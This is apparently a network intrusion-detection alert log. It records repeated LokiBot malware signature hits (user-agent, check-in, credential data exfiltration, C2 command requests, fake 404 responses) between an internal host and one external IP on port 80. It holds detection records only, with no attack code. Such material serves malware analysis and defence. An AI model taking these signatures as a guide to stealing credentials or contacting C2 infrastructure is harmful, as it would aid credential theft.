2024-09-25T15:28:36.808752+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:36.808752+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:36.808752+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:37.472266+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49730	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:37.787248+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:38.475893+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49731	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:38.549981+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.241108+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.241108+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:39.246004+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49732	TCP
2024-09-25T15:28:39.422340+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:39.422340+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:39.422340+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.175614+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.175614+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:40.181088+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49733	TCP
2024-09-25T15:28:40.334278+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:40.334278+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:40.334278+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.113236+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.113236+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.118035+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49734	TCP
2024-09-25T15:28:41.272883+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:41.272883+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:41.272883+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:41.990383+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:41.990383+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:41.995245+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49735	TCP
2024-09-25T15:28:42.154915+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:42.154915+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:42.154915+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:42.845238+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:42.845238+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:42.850104+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49736	TCP
2024-09-25T15:28:43.005872+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:43.005872+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:43.005872+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:43.869838+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:43.869838+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:43.875473+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49737	TCP
2024-09-25T15:28:44.024460+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.024460+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.024460+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.707278+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.707278+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:44.712136+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49738	TCP
2024-09-25T15:28:44.864953+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:44.864953+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:44.864953+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.626258+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.626258+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:45.631218+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49739	TCP
2024-09-25T15:28:45.794467+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:45.794467+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:45.794467+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.435201+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.435201+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:46.440257+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49740	TCP
2024-09-25T15:28:46.586604+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:46.586604+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:46.586604+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.272281+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.272281+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:47.278219+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49741	TCP
2024-09-25T15:28:47.459806+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:47.459806+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:47.459806+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.160931+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.160931+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:48.165787+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49743	TCP
2024-09-25T15:28:48.329147+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:48.329147+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:48.329147+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.039252+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.039252+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.044212+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49745	TCP
2024-09-25T15:28:49.199142+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:49.199142+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:49.199142+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:49.978517+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:49.978517+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:49.983395+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49747	TCP
2024-09-25T15:28:50.188831+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:50.188831+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:50.188831+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:50.952046+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:50.952046+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:50.956867+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	49749	TCP
2024-09-25T15:28:51.102415+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.102415+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.102415+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.830924+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.830924+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:51.835887+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55890	TCP
2024-09-25T15:28:51.992772+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:51.992772+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:51.992772+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.731636+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.731636+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:52.736496+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55892	TCP
2024-09-25T15:28:52.881678+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:52.881678+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:52.881678+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.550696+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.550696+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:53.555610+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55893	TCP
2024-09-25T15:28:53.727656+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:53.727656+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:53.727656+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.379847+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.379847+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:54.384675+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55894	TCP
2024-09-25T15:28:54.537764+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:54.537764+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:54.537764+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.230197+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.230197+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:55.235087+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55895	TCP
2024-09-25T15:28:55.513579+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:55.513579+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:55.513579+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.263321+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.263321+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:56.268225+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55896	TCP
2024-09-25T15:28:56.412404+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:56.412404+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:56.412404+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.191920+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.191920+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:57.196981+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55897	TCP
2024-09-25T15:28:57.598723+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:57.598723+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:57.598723+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.321400+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.321400+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:58.326273+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55898	TCP
2024-09-25T15:28:58.474678+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:58.474678+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:58.474678+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.169488+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.169488+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:28:59.176151+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55899	TCP
2024-09-25T15:28:59.484196+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:28:59.484196+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:28:59.484196+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.300722+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.300722+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:00.305746+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55900	TCP
2024-09-25T15:29:00.473536+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:00.473536+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:00.473536+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.202417+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.202417+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:01.207280+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55901	TCP
2024-09-25T15:29:01.372433+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:01.372433+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:01.372433+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.085525+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.085525+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:02.090433+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55902	TCP
2024-09-25T15:29:02.239881+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:02.239881+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:02.239881+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.023456+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.023456+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.028345+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55903	TCP
2024-09-25T15:29:03.276280+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:03.276280+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:03.276280+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:03.936890+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:03.936890+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:03.941766+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55904	TCP
2024-09-25T15:29:04.099861+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.099861+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.099861+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.757534+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.757534+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:04.762456+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55905	TCP
2024-09-25T15:29:04.914672+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:04.914672+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:04.914672+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.574850+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.574850+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:05.579762+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55906	TCP
2024-09-25T15:29:05.723093+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:05.723093+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:05.723093+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.426526+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.426526+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:06.431327+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55907	TCP
2024-09-25T15:29:06.587971+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:06.587971+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:06.587971+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.270520+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.270520+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:07.275362+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.4	55908	TCP
2024-09-25T15:29:07.449997+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:07.449997+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:07.449997+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	55909	188.114.96.3	80	TCP
